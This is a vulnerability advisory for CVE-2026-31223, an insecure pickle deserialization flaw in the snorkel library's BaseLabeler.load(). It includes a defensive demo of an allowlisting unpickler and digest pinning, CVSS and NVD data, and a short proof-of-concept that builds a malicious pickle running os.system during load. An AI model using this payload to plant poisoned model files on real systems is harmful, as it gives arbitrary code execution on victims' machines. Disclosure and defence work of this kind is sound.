Security Vulnerability Report
CVE-2026-31223 CVSS 8.8 HIGH

Published: 2026-05-12 16:16:14
Last Modified: 2026-05-13 15:46:19

Description

The snorkel library through v0.10.0 contains an insecure deserialization vulnerability (CWE-502) in the BaseLabeler.load() method of the BaseLabeler class. The method restores a saved labeler by calling pickle.load() on whatever file path the caller supplies, with no validation, integrity check, or restriction on what the stream may reference. Python's pickle format is not a safe serialization format for untrusted data: a stream can name any importable callable and have it invoked with attacker-chosen arguments during deserialization, so loading a malicious file amounts to arbitrary code execution. An attacker who can get a victim to load a crafted pickle file (for example a model shipped as a download or shared between users) therefore runs code on the victim's system with the privileges of the loading process. The CVSS vector (AV:N with UI:R) reflects that the file is delivered remotely but the victim must still load it. This record lists no fixed version, so treat labeler files as code: load only files from a trusted source, verify a pinned digest or signature before loading, and never call load() on user-uploaded files.
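To make the mechanism concrete, the following added example (not part of this advisory and not snorkel's own code) builds a labeler-like pickle whose __reduce__ makes a callable run during load, shows that an unrestricted pickle.load() invokes it, and then applies the two controls a consumer of such files can use today: an Unpickler subclass whose find_class() refuses any global outside an allowlist, and a pinned SHA-256 digest checked before any unpickling. The state dictionary, the allowlist, and os.getpid as a harmless stand-in for os.system are all assumptions made for the demonstration.

```python
"""Why pickle.load() on an untrusted model file is code execution, and two
controls that stop it. Added example; not snorkel code."""
import hashlib
import hmac
import io
import os
import pickle
from typing import Any

# Constructed stand-in for a labeler's saved state: plain data only.
# Assumption: the real file format is whatever the library's save() wrote.
BENIGN_STATE = {"cardinality": 2, "weights": [0.25, 0.75], "name": "demo"}


class MaliciousPayload:
    """When unpickled, the stream names os.getpid and the unpickler CALLS it.
    os.getpid is a side-effect-free stand-in for os.system('...'): the
    mechanism is identical, only the callable and arguments differ."""

    def __reduce__(self):
        return (os.getpid, ())


def make_benign_pickle() -> bytes:
    return pickle.dumps(BENIGN_STATE)


def make_malicious_pickle() -> bytes:
    return pickle.dumps(MaliciousPayload())


def unsafe_load(data: bytes) -> Any:
    """What the vulnerable pattern amounts to: pickle.load(open(path, 'rb')).
    Any callable named in the stream is imported and invoked here."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse to resolve any global that is not on an explicit allowlist.
    Dicts, lists, numbers and strings never reach find_class, so a file
    containing only those loads; a reference to os/posix functions does not."""

    # Assumption for the demo: the only non-builtin type a trusted file needs.
    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module: str, name: str):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refused global {module}.{name}")


def restricted_load(data: bytes) -> Any:
    return RestrictedUnpickler(io.BytesIO(data)).load()


def verified_load(data: bytes, expected_sha256: str) -> Any:
    """Only unpickle bytes whose digest matches a value obtained out of band
    (pinned next to the download URL, or from a signed manifest).
    Constant-time comparison; the restricted unpickler is still applied."""
    digest = hashlib.sha256(data).hexdigest()
    if not hmac.compare_digest(digest, expected_sha256):
        raise ValueError("model file digest mismatch; refusing to unpickle")
    return restricted_load(data)


def run_demo() -> dict:
    """Exercise each loader against both files and report what happened."""
    benign, malicious = make_benign_pickle(), make_malicious_pickle()
    results = {}
    # 1. Unrestricted load: the callable runs during deserialization and its
    #    return value (our pid) is what load() hands back as the "model".
    results["unsafe_ran_callable"] = unsafe_load(malicious) == os.getpid()
    results["unsafe_benign_ok"] = unsafe_load(benign) == BENIGN_STATE
    # 2. Allowlisting unpickler: the malicious stream is rejected before the
    #    callable is resolved; the plain-data file still loads.
    try:
        restricted_load(malicious)
        results["restricted_rejects_malicious"] = False
    except pickle.UnpicklingError:
        results["restricted_rejects_malicious"] = True
    results["restricted_benign_ok"] = restricted_load(benign) == BENIGN_STATE
    # 3. Digest pinning: the pinned digest belongs to the trusted file, so a
    #    swapped or tampered file never reaches the unpickler at all.
    pinned = hashlib.sha256(benign).hexdigest()
    results["verified_benign_ok"] = verified_load(benign, pinned) == BENIGN_STATE
    try:
        verified_load(malicious, pinned)
        results["verified_rejects_swapped_file"] = False
    except ValueError:
        results["verified_rejects_swapped_file"] = True
    return results


if __name__ == "__main__":
    for check, outcome in run_demo().items():
        print(f"{check}: {outcome}")
```

The allowlist is the important design choice: it is a denylist's inverse, so a new gadget in some other importable module is refused by default rather than discovered after the fact. The digest check is the control that works even when the file legitimately needs classes you cannot allowlist (custom labeler types, torch tensors), because it moves trust from the file's contents to a value you obtained through a channel the attacker does not control.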

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
(network attack vector, low complexity, no privileges required, user interaction required, unchanged scope, high confidentiality/integrity/availability impact; exploitability 2.8, impact 5.9)

Configurations (Affected Products)

cpe:2.3:a:snorkel:snorkel:*:*:*:*:*:*:*:* - VULNERABLE
Snorkel <= 0.10.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import os
import pickle


# Malicious class: pickle serialises the tuple returned by __reduce__, and the
# unpickler calls its first element with the second element as arguments.
class MaliciousPayload:
    def __reduce__(self):
        # Command to execute (e.g., create a file or pop calc)
        return (os.system, ("touch /tmp/pwned",))


# Generate the malicious pickle file
with open("exploit.pkl", "wb") as f:
    pickle.dump(MaliciousPayload(), f)

print("Malicious pickle file generated: exploit.pkl")

# Victim code simulation. load() is an instance method in snorkel, so in
# practice the victim calls it on a concrete labeler object; the command runs
# inside pickle.load() before the file's contents are ever inspected.
print("Victim code simulation:")
print("from snorkel.labeling import BaseLabeler")
print("BaseLabeler.load('exploit.pkl')  # This triggers the exploit")
```

References

https://github.com/snorkel-team/snorkel (Product)
https://www.notion.so/CVE-2026-31223-35d1e1393188811ab1d0e4a8a2e67992 (Third Party Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-31223",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T16:16:14.223",
    "lastModified": "2026-05-13T15:46:18.567",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The snorkel library thru v0.10.0 contains a critical insecure deserialization vulnerability (CWE-502) in the BaseLabeler.load() method of the BaseLabeler class. The method loads serialized labeler models using the unsafe pickle.load() function on user-supplied file paths without any validation or security controls. Python's pickle module is inherently dangerous for deserializing untrusted data, as it can execute arbitrary code during the deserialization process. A remote attacker can exploit this by providing a maliciously crafted pickle file, leading to arbitrary code execution on the victim's system when the file is loaded via the vulnerable method."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-502"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:snorkel:snorkel:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "0.10.0",
                "matchCriteriaId": "F2E7FC3A-64C0-4F69-84DD-FC9BA0883D08"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/snorkel-team/snorkel",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "https://www.notion.so/CVE-2026-31223-35d1e1393188811ab1d0e4a8a2e67992",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}
```